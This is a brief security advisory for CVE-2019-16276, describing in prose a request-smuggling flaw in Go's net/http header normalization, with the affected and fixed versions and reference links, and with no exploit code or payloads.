ASA-2019-00570 – Go: Request Smuggling due to normalization of invalid headers


Allele Security Alert

ASA-2019-00570

Identifier(s)

ASA-2019-00570, CVE-2019-16276

Title

Request Smuggling due to normalization of invalid headers

Vendor(s)

The Go Authors

Product(s)

Go

Affected version(s)

Go versions before 1.13.1
Go versions before 1.12.10

Fixed version(s)

Go version 1.13.1
Go version 1.12.10

Proof of concept

Unknown

Description

Go’s net/http (through net/textproto) used to accept and normalize invalid HTTP/1.1 headers with a space before the colon, in violation of RFC 7230. If a Go server is used behind a reverse proxy that accepts and forwards but doesn’t normalize such invalid headers, the reverse proxy and the server can interpret the headers differently. This can lead to filter bypasses or request smuggling, the latter if requests from separate clients are multiplexed onto the same connection by the proxy.

Technical details

Unknown

Credits

Unknown

Reference(s)

net/http: invalid headers are normalized, allowing request smuggling #34540
https://github.com/golang/go/issues/34540

197503: net/textproto: don’t normalize headers with spaces before the colon
https://go-review.googlesource.com/c/go/+/197503/

Analysis of Two Newly Patched Kubernetes Vulnerabilities
https://blog.paloaltonetworks.com/2019/10/cloud-kubernetes-vulnerabilities/

[ANNOUNCE] Security Advisory for CVE-2019-16276
https://groups.google.com/forum/?utm_medium=email&utm_source=footer#!topic/kubernetes-security-announce/PtsUCqFi4h4

HTTP Desync Attacks: Request Smuggling Reborn
https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn

CVE-2019-16276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16276

CVE-2019-16276
https://nvd.nist.gov/vuln/detail/CVE-2019-16276

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: October 17, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.